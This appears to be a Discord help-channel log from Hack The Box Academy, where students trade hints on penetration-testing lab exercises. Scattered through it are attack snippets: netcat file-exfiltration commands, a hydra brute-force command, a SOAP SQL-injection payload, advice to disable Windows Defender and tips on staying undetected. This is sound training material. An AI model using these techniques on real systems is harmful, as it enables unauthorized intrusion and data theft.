#modules
Hi, I'm having trouble on the Password Attack module, last question of Pass the Hash section, I'm trying to get a reverse shell through Invoke-WMIExec, it's showing that the command is executing on the DC01 target, but I'm not getting any connection to my netcat listener, any tips?
I've tried both the 10.x.x.x IP and the 172.x.x.x IP, and a couple different shell commands from reverseshells
nevermind, just tried again and it worked, don't know what I did different 
how about you get lost
Anyone able to help with Server Side Attacks - Skills Assessment?
I have the ||G3tTh4tF1l34M3?|| and ||http://127.0.0.1:8080/message.txt||
nvm
probably not the place, but any ideas on how I could get a light mode to work on htb?
i asked about this. no light mode unfortunately.
ah yeah I figured, thanks for the confirmation though. wild that it's not an accessibility option
I have an extension that bolds the beginning of words for reading, but it's sorta painful to use on light text
they recommend if the browser has a contrast setting to change it, though not really the same.
Pivoting
Anybody know what tool to use to talk to an ibm-db2 service?
I'm on the nmap hard lab.
honestly, this is better than the usual "how do I hack my ex's instagram"
what was the message?
Hi everyone, I don't know if you could help me, I'm stuck with Windows Privilege Escalation Skills Assessment - Part I. I'm not able to connect to the target. I don't know what username and password to use since it doesn't appear in the section. I have done an nmap and I see the RDP port 3389 open. I have also done the nmap with --script rdp-ntlm-info, rdp-enum-encryption and rdp-vuln-ms12-020, I get more information but no users to connect via RDP. Could you give me a clue, please? Thank you so much!
Thanks @acoustic owl , but how can I leverage the command injection flaw without connecting via RDP? As I review the entire module, the only way was the connection through SQL and the port is not open and I do not have a user. I know I left something out but I've been backing it up for several days and I can't find other way!
Look at || port 80 ||
Ok, thanks, I'll look for the 80, to see if I am able to find something
Command Injection modules might be useful too
Hello guys can somebody help me with Exploiting Web Vulnerabilities in Thick-Client Applications I'm going to kill myself
I can help you. I already killed myself in that section
oh god thanks you
Hello, I'm currently at the module "PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP" and when I try to execute regsvr32.exe SocksOverRDP-Plugin.dll I get the following error. Please, how to solve this issue?
can anyone help me to solve vhost fuzzing module? I am totally frustrated to solve this.
You must first disable Windows Defender
The DLL is malicious and is detected and deleted by Defender
Which module, which section, which question, what have you already done? What does not work?
can i dm you?
sure
Thank you. It helped. It would be worth mentioning in the module steps.
hello
hello guys, can someone help me out on the AD Enum & Attack module on section kerberoasting from linux?
What does not work?
Got it. Thanks anyways
Not really a module question but was wondering if anyone uses removable storage with a VM? I want to save my notes for HTB on a portable SSD, but ive never mounted a device before. Im positive it IS connected to my VM but whenever i use fdisk -l i only get sda1, sda2, sda5.
Password Attacks >> Password Mutations - Am I really supposed to take the time and brute force SSH with a password list with a count of over 94K ?
try to narrow down the password list by simply using only words that start with the letter b/B
Thanks for the tip
hello, extremely new to HTB, coming from THM 2%, goals are OSCP or eCPPTv2 atm, been advised to do TJ Null's box's, how do i find them?
coming from a telecommunications background, so far i've achieved CCNA, eJPT, CEH and working on security+
Better ask here #general
Table of Contents: Overview Dedication A Word of Warning! Section 1: General Course Information Section 2: Getting Comfortable with Kali Linux Section 3: Linux Command Line Kung-Fu Section 4: Essential Tools in Kali Section 5: Getting Started with Bash Scripting Section 6: Passive Reconnaissance Section 7: Active Reconnaissance Section 8: Vulner...
Otherwise just ask the search engine of your confidence
thank you!
TJNull's list is my plan after I finish HTB modules... which I will get to if they** stop releasing more modules**.
student plan?
May I know where is the "Dump Memory to File" in x64dbg? I am following materials, but it is hard to follow. Course material doesn't mark up where to click...
Unable to understand why HTB stuff doesn't instruct more clearly
M:Attacking Common Applications(Attacking Thick Client Applications)
No.
Course material says "Let's export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File."
but which address? where? Course material is so confusing....
Haha, they keep releasing more modules.
We are never finished
The next one...
I've read all of the CME module, and the Blind SQL injection module, and done most of labs in Blind SQL. So, hoping to have those two done by end of the week. And then do the reading for Deserialisation Attacks, and Abusing HTTP this weekend.
The HTTP modules are really hard....
I'm stuck in HTTP Attacks right now. I am somehow too stupid for it
Not looking promising for me then
One of the problems with the higher tier modules, less people have done them. Google Fu is less useful
The modules are also brand new. Of course, only a few people have done them
Not all of them surely?
No, I mean there are not many people who have taken these modules so far
and one more module
It seems to be not yet published
@pine dagger , we'll never get through all the modules
HTB makes modules faster than I can learn.
I mean, yesterday I finished the module HTTPs/TLS Attacks and today two new modules are coming out
oh yeah i want to know, if i finished a module under subscription, and they add more info to the module after the subscription, can i still access the module, or do i have to pay again to access it.
Since they claimed that if you finished a module during a subscription, it'd be as if you bought it.
So im just wondering if yall experienced this.
Every module that you complete during your subscription is yours.
If the module is later updated, it still belongs to you and you get the new content for free.
Feel free to DM if you're still stuck
Module:KERBEROS ATTACKS
Section:Unconstrained Delegation - Users
Hi, I need help in this section. I have followed all the steps as mentioned in the section, but the DCSync attack was not successful. Can I contact someone to show them the steps I have taken in detail? Thank you in advance.
Thank you, I have sent you a message.
hi, im stuck on the module File Inclusion section skills assessment, i find the page ifl_***** . Or I manage to list /access.log but when I send my webshell all of a sudden the logs don't refresh so no result afterwards, a hint would be a great help! TY
Take a close look at the log file.
It contains double quotes.
Your payload must therefore not contain double quotes
I hadn't thought of that! I test, thank you
this worked! thanks
Hi, can anyone help me on "SQLmap - Bypassing Web Application Protections" module? for case 9 and 11..
Need some hints on Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
for assessment 2 on AD enum and attack, i found the password dumping the lsa, but i cant seem to get the username for that password
I have System Shell on SQL01 and can execute mimikatz
Hi all
Module : Active Directory Enum & Attacks
Section : Skill Assessment 2
I am blocked on the question 4 " Use a common method to obtain weak credentials for another user.
Submit the username for the user whose credentials you obtain."
I guess the password (Wxxxxxxx) and confirme it with the next question, but impossible to find the user.
I tried all the technique explain in password spraying from linux but nothing work (cme or custom script).
I used the wordlist provide in the linux attack host /opt/jsmith.txt and several other lists present
on the host..
I am blocked on this modules since several days. if some one can help me it will be very appreciated.
Have a good day all
Did u use DomainPasswordSpray
nop i dont think; what do you mean ? it s a tool ?
i used classical crackmapexec cmd most
U can xfreerdp into ms01
with AB####
And then use DomainPasswordSpray
Internal Password Spraying - from Windows:
Did it work
Hello, Noob question here. I am at module "Information Gathering - Web Edition" at the Vhosts section. I use my own Parrot linux VM locally. I start the target system, after that I download the ovpn file and start my vpn connection using that file. I assumed the target system is a name server as I can use dig pointing to this target IP. However I do not seem to find how to get to the vhost machine. In one attempt I even tried the target system to execute "curl -s http://<target IP> -H "Host: www.inlanefreight.htb", to no avail. What am I missing here.
you need to add the entry to etc hosts
gottem
I was first
@odd notch you thought
Hi where is the word list suggested in the SMTP section in the footprinting module.
Hey I need some help on the Meterpreter module in Academy. I am supposed to exploit the msf module iis_webdav_upload_asp on port 80 however the Microsoft IIS httpd 10.0 service is running on port 5000 and can't be accessed with the exploit. I don't see a way of fixing it
Do you have the IP address and corresponding host name entry in /etc/hosts?
Yesss !! thks a lot
maybe try set RPORT 5000
Already did
rip
Isn't really something on my end idk how to get past it
Also can't reach support on Academy the messaging doesn't work
You could try looking up exploits for it online and use those
or in searchsploit
Is it a certain CVE you're exploiting?
Footprinting contains a username/password wordlist iirc

Ye there is a resource button. I missed it. but how do i use it tho
the list that is
not the button
In the Academy module you are literally supposed to copy what they are doing it isn't supposed to vary. They give you the exploit and it is the same service
Sometimes the write ups don't work
Right click the download button, copy link address. In your VM do wget <paste link>
I would probably suggest starting over and doing it again and if it still doesn't work then maybe try searching for a different exploit
I assumed using the IP directly would have been enough. What would you add to the /etc/hosts file to fix this? <IP address > target?
Academy modules can vary from the examples given. They aren't always 1:1
no I mean how do I use the list to enumerate... I don't see any suggested utilities. I dunno if I should find one myself or is there some recommended one
In the Kerberos Attacks module Skills Assessment, is there a way to get DA and/or a shell on the DC? I got the flag but not a shell/login.
This one seems to be it isn't my first module
So if you do cat /etc/hosts you'll see that there's an IP address and a corresponding host name. So you'll want to add the box's IP address and the host name in the same format
What module & section?
39 and 414
Names
Numbers don't mean shit to me
It is literally called Meterpreter lmao
It usually is, but the web server is using a virtual hosts file. So it redirects incoming requests to the domain which is why it appears to not work (and also why you need the entry in etc hosts)
It says not to rely on it... but it suggest we use a list in the question. I'm confused. there is no mention of a tool
I have the list
Not relying on it doesn't mean to not use it. It just means it can give false positives, so manually checking its results helps confirm things
ok... still no tool tho
I mean I found a username || root || but is not the answer obv
Smtp-user-enum
where did you see it in the section? just as a sanity check for me
don't see it in the section sorry
Give me a sec to check notes. I don't recall if I was told about the tool or it was mentioned
someone who completed password attacks
am just missing the linux hunt section but im not able do find it
So getting the "apache2 ubuntu default page" is what I should get? That is with setting both the inlanefreight.htb and the www.inlanefreight.htb in the hosts file.
It's in the section "Attacking Email Services"
You'll get whatever documents the web server is serving, so in this case it appears to be serving the default Apache pages yes
So it's not mentioned in footprinting
There are multiple commands that you can use to find stuff from that section specifically
and a few tools mentioned as well on how to get the credentials
that's a bit ahead of the module
interesting
Is there another way that people are meant to enum SMTP in footprinting @autumn pilot or is it the list is small and manual is fine
if I can recall correctly, you can use the metasploit module with the default list to do that
nope not there yet
Oi, you still need help with this? I found your issue
yes
hey guys im doing pass the ticket linux and when i use keytabextract.py on svc_workstations.kt i dont get ntlm hash which i am supposed to crack, is it supposed to be like this?
Have you navigated to the website on port 5000?
We're referring to using msfconsole to use an exploit not the academy module
Yes nothing shows up
Is it 5000, or 50,000
5000
On shitty mobile so the screenshot doesn't load for me of their enumeration
I tried manually going on the web to port 5000 to the address and it says it is too long to load or something
no
Try resetting your VPN connection then
That's the issue. You're attacking the right port but you need to see that service. Following along in this example isn't exactly right. You're on the right track but you need to know that service in order to be successful. Might want to hit it from the attack box that the platform provides
Yeah, but if you have the time later play around with it through your own VM again. It's good practice to troubleshoot. 
Odd... How would you go about making a bash script for that?
Test test
No problem. Good luck and hopefully you get a smooth run after this. 
Huh discord hang for a sec
Soooooo found a different exploit and don't think you were supposed to go the way I just found cause I found NT Authority lmao
YUP! lol Good on ya buddy.
No problem. Stuff can be frustrating, but just keep trucking and don't be afraid to boot up the attack machine to see if you get different results. Don't forget we are technically "researchers" so explore as much as you can when it comes to labs and modules. The more you practice the better you'll be in a practical situation.
Thanks for the pep talk XD It is always good to just take a break then come back to it
Hard to do a bash script for it just BC SMTP is a slowwww service
OK, found it. The default apache page threw me off a bit. And using a 150K+ wordlist for fuzzing the domain name yielded so many result that I did not notice the hosts that returned a different result from that default page. Thx for the help.
Np
In msfconsole just do "search SMTP enum"
hey might be a dumb question, but how do i get file content through smbclient?
Automatic verification failed. Please contact support.
what
Bot got borked
like rn i am using this command and got this:
what cmd can i use to retrieve the julo.txt?
Well if you're impersonating him, you can just connect to his share and use "get"
Also don't mind the bot he's a little durnk
Ditch the -c option because it's connecting, running the command you're specifying and then dropping the connection after output.
Who crashed the bot? 🤪
hahaahh
With every message it seems to do react with the bot
yup!! tnx
Or using -c "get julio.txt"
please someone who can help me in password attacks module - sectio: linux hunting
whatsup
Footprinting Skill Assessment - Medium
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
I've found the credentials for the "other" account, i'm unable to login in SQL Management Server
Perhaps try logging into the windows account that can be associated with the found username
You can also try using the CMD line instead
Worked, Thankyou
how can i transfer my keytab from ssh to my local?
i tried opening python http server on ssh
and wget from my machine
but its not working for sm reason
In some cases making an HTTP connection is not allowed on systems from the outside to in. You'll need to find a way to upload to your machine because calls out to your own machine should be more lenient. In some cases an upload might not be necessary. Definitely go back to the file transfer module and look over it. This is a must if you plan to get into pentesting, because you need to be able to adapt for exfil. If you don't want to go review the module this link might be of some use https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration.
i still cant seem to get it...
i tried using python uploadserver but its also not working
What are you trying to do?
Download a file from the target machine to your local host?
You can use netcat
that's probably the most convoluted way
Not at all
from target machine though you can run the python http server and use wget on your local machine to grab it
Or you could use netcat
i did alr
its not working
so in your ssh session on the target machine you ran the python http server
not on your pwnbox/vm
Would you like to try the method I suggested
password attacks linux pass the ticket
with netcat?
follow the instructions
Yes
in that section
iirc there was no need to download anything
or I just copy/pasted
either way
huh

im trying netcat rn
Do you want me to guide you through it
ok
now I remember
I was able to upload from the connected host
i used the syntax: curl -T <filename> <myserver>
-T is for post request
its not working idk why
You're probably not doing it correctly
Would you like me to guide you through how to do it
sure
and how did you start the upload server?
holy tits im on this file transfer problem for like 2hr
i'd suggest going over the file transfer part again
im going all over my notes
but nothing is working
i ususally just make python http server
and its always chill
On your local host: nc -l <port> > <file name>
python -m uploadserver (port)
oh yeah
i tried that
it was not working
it crashed everytime
idk why
it would ping my server on local machine
but never send the file
@glacial hazel
this good?
its two terminals
What command did you type on your local host
oh
I see the issue
they used the -l flag
on their local host
doesn't -l indicate that you are listening on that port
yes
but they are already listening on the target machine
which is the problem :)
they aren't actually connecting
they are just setting up listeners xD
i tried connecting
@naive field what command did you type on your local host
which ip should i use the machines 10.129.x... or the 172.1.6.15
the top one
On the host with the file: nc -w 2 <your ip> <port> < <file to transfer>
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
$ nc host.example.com 1234 < filename.in
the first command is on local machine
or the attack?
reading comprehension will tell you
Send the command you're using
let me try again with diff ip

since the second paragraph starts with "using a second machine"
im sry im just in my class and trynna do this so its like doing 50 things at once
also comprehending "filename.out"
focus on your class first then come back to this later
i dont have
wifi at home
:D
since im an exch student in usa
then that sucks to suck then brother. If you have a phone you can see if your provider offers tethering services
i got no bag for internet rn
i got hotspot
but its 20gb /month
so it goes out pretty fast xd
you really shouldn't be using that much if you're JUST doing academy content on the hotspot
yeah but i use pwn box
but YouTube and streaming platforms
so the pwnbox uses additional wifi
not really how that works chief
yeah prob
but it still eats my internet ngl haha
and sometimes i wanna watch something on laptop so yeah...
like yes it does use additional data; but not enough to be shooting it through
yeah
and i play music on yt while im doing htb
Video streaming is going to be the roughest
yeah its fucked
but i gotta hustle through this
i got 3 more weeks in usa
cant let this stop me from grinding
you can't do this when you are back home?

i didnt see this yesterday but ty nonetheless
then not much we can do to help
you can see if your school is willing to let you stay longer
because of your home situation not having internet
i do stay longer
i finish in like 10min
ill come back
i do my shit in library when i finish school
but also when you put a time constraint on yourself you only end up stressing yourself out more ¯\_(ツ)_/¯
thats true
like it's good to have a goal time
but you said end of june? that's still a month and a half away
that's PLENTY of time
yeah but i am not sure if i can get ready for cpts by that time
and that's ok
¯\_(ツ)_/¯
it doesn't reflect negatively on you that you aren't ready by your own arbitrary deadline
but my AD knowledge etc.. not good.
yeah
i m just trynna get a job as soon as possible
thats why im trynna stay on grind as much as i can
cpts and cbbh aren't guaranteed to get you a job
hell most certs don't guarantee a job
if you're actually looking for a job, you're better off getting OSCP
yeah i did want to
as that's industry recognized
but hell i got no money even close to 2500$ lol
CPTS isn't as industry recognized yet
i was gonna ask if the oscp was one of the certs that get a job cuz thats what im going for
oscp is $1500
OSCP opens the door; CPTS actually helps you nail the interview
yeah mb
whats in the cpts that isnt covered by the OSCP if u know?
still too much for me haha
lmao fair
it mostly is all covered
it's mostly all the same from the OSCP syllabus
but we are starting to stray from topic here
except u cant use any automation tools in oscp
(the ones u didnt write )
like linpeas etc...
really crazy i feel like i researched it
yeh it was pretty famous
"scandal" hahahaah
since that guy was a big head in cybersec
ah they have one auto exploit in linpeas thats y
u can use auto enum on oscp fine tho i think
No he still passed
straying off-topic from modules please move conversation to DMS or @halcyon pond can verify their app.hackthebox.com account following #welcome and move chatter to #careers-and-certs
oh yeah mb
ok im back
imma do this now
Whats the toughest module
its not working
😭
workss
Here's something I like to do. Sometimes the more simple the better. Cat out the file and pipe that into base64 encoding. Then copy paste into a file. Afterwards base64 decode and redirect into a new file. MD5sum for sanity check
I've heard the common one being tough is AD
yeah i wanted to do that but i wanted to do this first
yes netcat isn't instantaneous especially if it's data transfer; you're just not going to see the progress bar
since i was like shit i gotta see where its the problem
https://academy.hackthebox.com/achievement/531355/25 @acoustic owl Thanks for the nudge ; )
Kerberos is an authentication protocol that allows users to authenticate and access services on a potentially insecure network. Due to its prevalence throughout an Active Directory environment, it presents us with a significant attack surface when assessing internal networks. This module will explain how Kerberos works thoroughly and examines se...
Also think about it in terms of detection. The less you do and the less connections you make into the network the less noise you make. I definitely encourage you to explore, but sometimes getting fancy isn't worth it. Real adversaries want quick in and out as cleanly as possible.
the transfer with netcat worked?
yup
but now i got hella other problems lmaoo
this password attack module really drained tf out of me
interesting
I have been struggling for a while to get any information off the ftp server for the footprinting easy lab and need a nudge. I am stuck with the "229 Entering Extended Passive Mode (|||3945|)
150 Opening ASCII mode data connection for file list
226 Transfer complete" message and I am not sure how to move ahead
okay i restarted the machine
retired everything and its not working
i get this when i try to run proxychains
i started chisel server and connected to it through rdp
just as it said in the module
i feel like an a-hole asking this much in this channel
...
dm me
looks like your tunnel is broken. feel free to dm me if you need another pair of eyes for debugging
congrats - I'm curious about the very last question of the module: #modules message
(I maybe should have quoted that question a different way... hope it makes sense)
I was only able to access the drive. i did not get a shell
lolol
Just FYI; for the unix name (uname) portion of the Introduction To Academy/Interactive Section with Terminal, there is no longer a 'parrot' anywhere in the string:
Linux htb-b60zrcs6kk 6.1.0-0.deb11.5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1~bpo11+1 (2023-03-05) x86_64 GNU/Linux
Well it became clear, that only rubeus was on there ๐
This is better to post in #858470491676737536
Thanks @fathom pendant
I do think, we can upload netcat. We have to mount it to the parrot OS -> RDP session
hey guys am stuck at Firewall and IDS/IPS Evasion - Hard Lab
i tried to run different scans
umm is there any tip
getting port 22 and 80, services are visible.
there are more ports for you to find. try to find another nice trick to circumvent the firewall
okay
thanks
there are several scans which I think I should run but they may consume soo much time
am not sure if I am in the right track
dm me then
ok im out of ideas w/ Hacking Wordpress, Directory Indexing - i used wget to mirror the entire tree of the listable directory and didnt find a flag in there
or is there another listable directory not in that hierarchy
ugh nevermind, its not given in the structure section, but its mentioned in subsequent sections
oh sorry am just new
https://academy.hackthebox.com/module/35/section/247 Is this what this is supposed to look like? I can't find a search in the exercise anywhere
Anyone working on windows attack and defense module?
np
Well how do I connect to DC1 using the given creds
Any of its sections,
I just began with DCSync
Bounced back to 2nd section to see details of any guide on connection to DC1
so by connect are you asking about getting shell?
after already having domain creds?
Like RDP, because I have to see event logs
It's in a different network, can't access it directly
if its one you're meant to see event logs it should have specific instructions for you
otherwise you could pivot and run rdp via proxychains
but I dont think theres any segment that actually requires doing that
Yeah
And there's no clear instructions on how to actually connect to DC1
if its just shell run through the usual psexec/smbexec/winrm/wmiexec, ect
In every single assessment in each section carrying cubes, it states connecting to DC1
press Win+R ,type mstsc
Nope
what specifically are you trying to do in which section
I tried switching to user accounts as well, but to my surprise there wasn't an option even lmao
i have done this module press Win+R ,type mstsc and use the creds for DC1
ah here I was thinking you meant this was the AD attacks and enumeration module
Thanks bud
I had tried it once and I'll retry it again, maybe I mistyped it
idk for that specific one
No no
Hey Everyone! I am currently working on the File Upload Attacks - Skills Assessment section:
Stuck and need a nudge. I fuzzed the directories and found all the interesting PHP files. I read through the material and tried to use a method in the other section to read the contents of PHP files (I got it to work in the exercises by viewing the source of the page). So trying the same technique, it looks like my file is uploading (with a bypass technique), but I am not getting a B64 dump of any of the PHP files I try to read (I tried them all just as a sanity check). Please drop me a nudge in the right direction so that I can read the PHP file I discovered. Thanks, everyone.
Are there any other ports open
Usually mysql isn't exposed externally
So you may need to abuse another attack vector to get access to the machine to get access to mysql
the only port I know for Mysql is 3306, i didn't think there were other ports because thats what the module told me.
Hello, has someone solved BROKEN AUTHENTICATION - Brute Forcing Cookies (Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.)? I am stuck in decoding cookie, i have recognized the ||URL encoding and base64||, if i convert the result ||to HEX i can see the magic bytes 78 9C but i can't unzip using gunzip||.
Hint: ||It's not hex||
When using socks in Metasploit after setting preferences then i run it, it starts then automatically stops straight away. any ideas? also cant see anything remaining in jobs.
In the footprinting medium lab, am I supposed to be able to login with the account found from the file you can mount?
Hey so, I can't shut down this seasonal box? Are we not able to until the time expires? I've just been doing this box for 10 hours straight, and need a break.
Nvm
Yeah. You gotta figure out which service you'd log in with. Poke and Prod around.
The answer of what service is kinda in your nmap scan. use acronyms.
I'm in Using Web Proxies and the Proxying Tools section. Every IP address I try just gives a message at the end saying "Connection: close" and that's not the answer to the question in this section. Anyone else run into this?
thanks, I will try
You can use that login on certain services
Is your proxychains.conf correct
i added the thing they mentioned in the module
i just edited that and added this socks5 at the end
someone who completed password attacks
am trying to type the files with mimikatz but im not being able
what section?
passthehash
dm me
cool the new insignia for the seasonal machines
If you're using the socks5 one comment out the socks4
ohhh
yeah that wsa the issu
issue thanks a lot
oh shit nope
i thought it connected 🤣
now im getting linux socket error or timeout
before there was none of that
I think you need more for the wmiexec issue because I believe it's expecting an IP not a cname
Linux01 is a domain (usually -d )
But idk wmiexec enough
It said in module this
"To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option -k."
:{
Does it give that as example?
Interesting
definitely since ive been on this for like 2hr
hahaha
stuck on this part
good luck ¯\_(ツ)_/¯
and i cant get the last question xd
ay
thanks a lot for helping
for real
i see u all the time here in chat i rly appreciate it
Lol no
yeah thats what i thought lol
was just interested since ur really helping here all the time :D
Anyone have advice on this Active Infrastructure Identification question
Has anyone gotten past the Proxying Tools section in Using Web Proxies? I've gone through the steps to set everything up right and I even get a line in HTTP history that says robots.txt. However, the only response I ever get at the end of the request, no matter what web site I use, is Connection: close. Does anyone know how to get the answer for this section? The hint says it starts with 'msf'.
I'm stuck on shells and payloads - bind shells. SSH is not working I been trying for 30 mins. And if it does work it doesn't let me type. I feel like I can beat it in 2 mins if ssh would work
Are you on the second question?
Have you tried using the script under No. 1: Server - Binding a Bash shell to the TCP session?
Yes the second
Try following the steps under Establishing a Basic Bind Shell with Netcat.
Yes I want to use that manual bash shell but I can't SSH into the target
It's not letting me
Or rather it's taking a very long time
That command is how you ssh to the target. And don't forget your listener. Also, ls -la is your friend.
Now I'm confused the command is how you SSH into the target?
Oh, wait. Never mind. You do have to ssh to the target first. Try restarting the session.
Yeah I did 5 times now Im waiting for response from support rn
I'm going to see if I can jump in and run it.
I had no problem getting in. Are you sure you're doing $ ssh htb-student@Ip-Address and then putting in the password?
Yes
Are you trying from your VM or the pwnbox?
Tried vm first then switched to pwnbox
Anyone avail for a nudge on the skills assessment for HTTP ATTACKS? I believe I (a) understand the hint [based on doing some testing], (b) believe I've got all the value-lengths fixed... BUT... still getting the WAF error, which suggests even though it should be bypassing the WAF, that it's not... but in my enumeration, I don't see any other means possible to do it... totally lost/frustrated at this point.
EDIT: Realized error of my ways wrt the WAF, email request SEEMS to go thru (based on return values), but NO email...
EDIT2: SOLVED!!! Solution was something I swear I had (unsuccessfully) tried before, but suspect did it slightly wrong before + exhaustion -- with a clear head, quickly knocked it out.
I'm not sure what the issue would be. I was able to ssh in on both.
@red current thanks! Had to restart my PC not sure what was going on.
After restart got the flag
So I'm looking at the first part of the pivoting module with Dynamic Port forwarding with ssh and socks tunneling -- Which command do I need to actually do in the lab? I'm doing ssh -D 9050 ubuntu@10.129.202.64 but when I nmap with proxychains nmap -v -sn 172.16.5.1-200 to nmap the internal network I get a no route to host?
Nice!
Have you set the tail and modified your proxychains.conf file?
Oh it's because the no route to host was for the other ports on other services. I see, I was able to scan it with a dynamic port forward
is anyone available to help me with password attack pass the ticket linux? im on the last question stuck all day
thanks!
Would like to see if the username and password are clickable. I mean, just click and copy, just as IP address do.

If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.
help me
I know the answer but it shows up as incorrect lol
the command would be sudo tcpdump -nvXc 100 in order as indicated in the question but I can't find the answer if it is correct.
or sudo tcpdump -nvvXc 100
In the order indicated but does not appear as valid
only the parameters
**what are the switches used? please answer in the order the switches are asked for in the question.**
Hello somebody can help me with WEB SERVICE & API ATTACKS module
@autumn pilot The order according to the question is sudo tcpdump -nvXc100
-n Do not convert addresses (i.e. host addresses, port numbers, etc.) to names.
-v: When parsing and printing, produce (slightly more) detailed results. For example, the time-to-live, ID, total length and options in an IP packet are printed. It also enables additional packet integrity checks, such as IP and ICMP header checksum verification.
When writing to a file with the -w option and at the same time not reading from a file with the -r option, report to stderr, once per second, the number of packets captured. On Solaris, FreeBSD, and possibly other operating systems, this periodic update may actually cause the loss of captured packets on their way from the kernel to tcpdump.
-X:
When parsing and printing, in addition to printing the headers of each packet, print each packet's data (minus its link-level header) in hexadecimal and ASCII. This is very useful for parsing new protocols. In the current implementation, this flag can have the same effect as -XX if the packet is truncated.
-c:
Exit after receiving count packets.
im in skills assesment and i dont know how to solve it
you are asked for the switches (parameters) not the whole command
the switches are --> -nvXc 100
-nvXc 100 thanks @autumn pilot crack
can somebody help me with Web Service & API Attacks - Skills Assessment module please?
What exactly is not working?
when i put the sqli payload with some characters doesnt work
File "/home/ivan/Desktop/pocsoap2.py", line 3
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<LoginRequest xmlns="http://tempuri.org/"><username>admin</username><password> 'or 1 = 1' </password></LoginRequest></soap:Body></soap:Envelope>'
^
SyntaxError: cannot assign to operator
Remember that not all characters can be used in XML
https://stackoverflow.com/questions/1091945/what-characters-do-i-need-to-escape-in-xml-documents
I could use some help, I am stuck on skill assessment brute forcing, does anyone know what .txt file we are supposed to use for the password. I have tried multiple files (from locate password) and they either do not work or I get a list of passwords, and not work with the user name.
how tf do i get more cubes without paying
win giveaways or ctfs
Get a flag
You need to create your own list
||cupp|| is your friend
I do not believe so for the first skill assessment that is login into the browser.
This question?
As you now have the name of an employee, try to gather basic information about them, and **generate a custom password wordlist** that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
Hi, i'm struggling on the Active Directory Enum and Attack. The question is What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word).
i can't figure out where to look
No that is not the question. this is the question: Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
okay, then ||rockyou|| will help you
I wish...I have done rock you multiple time with even different Rock you versions. sometime I get passwords sometimes I dont, usually I get password file not found
example I have used this: hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://157.245.41.35:31182/admin_login.php:user=^USER^&pass=^PASS^:F<form name='login'"
and I get:
[ERROR] File for passwords not found: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
Check the path of your file
I have done locate Rockyou.txt and those file paths do not work. I am assuming the issue is the path for Rockyou.txt that I am having issue with but I cannot seem to fix it
Yes, you must specify the correct path to the file.
Are you using the PwnBox or your own VM?
I never know how to answer this, I think it is PwnBox. It is whatever I spawn then hit Parrot terminal
This is the PwnBox
yep that is what I use
okay, then the File should be here: /usr/share/wordlists/rockyou.txt
and here: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
Thank you so it is the one that seems to go on forever with [error] child...
Huh used both already, will try again
Thank you for your assistance
hi everyone. Not trying to thread hijack or anything, But im having an issue with HTB Academy. My option to load the target box isnt there anymore. I've looked up the VPN troubleshooting, but nothing helped. Anyone have any ideas?
Maybe that specific exercise doesn't need a target
The Attacks & Defense module is broken. The PKI - ESC1 segment cannot be answered because the PKI machine does not boot up
It does. It was there 2 days ago. Im working on Linux Fundamentals and most of them have the need for target boxes.
Ope. Ok. Thank you. I'll check other ones and see if its the same way
Oh nah my boy. That one doesn't have a targeted system. It's something you have to look up within terminal
oh! Ok. thank you. I have a lot to learn. Thank you all for the replies
Thank you for the help.
I have been stumped for a few hours now this morning and last night on the footprinting medium lab. I have the first set of credentials but I cant get any further now.
If you landed on the target machine you may want start the enumeration again. I have used some PowerShell to help me
hey anyone having some troubles with the 3rd host in the live engagement section on the shells & payloads module ?
the eternalblue is failing ? when tracing it back it can't write to the corrupted buffer
Anyone solved this issue ?
i've tried changing the payload
@zatoich1#3252
Hey guys, I'm stuck on the HArd Lab of "Firewall and IDS/IPS Evasion"... I made the firsts two without any problem but this one... Anyone for an advice?
Try all the evasion techniques they give you
BROKEN AUTHENTICATION Predictable Reset Token question 1. Why is it causing me so much trouble? If anyone can spare a moment...
Hey, as mentioned in the note you've to wait for 7-8 minutes before requesting the certificate.
this does not work for my brute force attack.
module 57, section 515
Thanks ! I tested everything in order again and found THE port I think
how do i connect to a machine from my kali linux
download the VPN file and sudo openvpn <VPN_FILE>
look for a button "Download VPN connection file". If you want to learn hacking, you have to be a little bit more curious and try to figure out things on your own
I'm new to hackthebox, I usually train with vids like cybrary
Hello guys for the "Password attacks" session "Hunting Credential in Linux" , the hint gave me username and password which is Kira and LoveYou1 but when I ssh given username and password it says password is wrong am I doing something wrong here?
Perhaps the user has had the opportunity to change the password a bit
BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adjustments to the reset script,
I am out of ideas as to why its not working.
Hacking WordPress - Skill Assessment
I cannot access http://blog.inlanefreight.local and cannot move forward with the skills assessment. Am I doing something wrong?
You need to add an entry in your hosts file to access it
local is not a TLD that has been approved by IANA. Therefore it cannot be resolved by the root nameservers.
Here you can find a list of all approved TLDs
https://www.iana.org/domains/root/db
anyone
dude. people do this out of the kindness of their heart, whenever theyre online.
patience is a virtue. go do something else
Hey anyone has done the shells&payload module ?
what exactly is the problem?
no matter what happens i never get the right token
can anyone help me with the shared object hijacking lab in Linux privilege escalation?
